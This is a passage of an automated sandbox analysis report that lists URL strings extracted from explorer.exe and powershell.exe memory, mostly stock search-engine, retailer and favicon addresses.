Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000026.00000000.477893700.000000000EE20000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000026.00000000.477893700.000000000EE20000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: powershell.exe, 0000001E.00000002.487850335.00000274579D0000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000026.00000000.478353017.000000000EF13000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
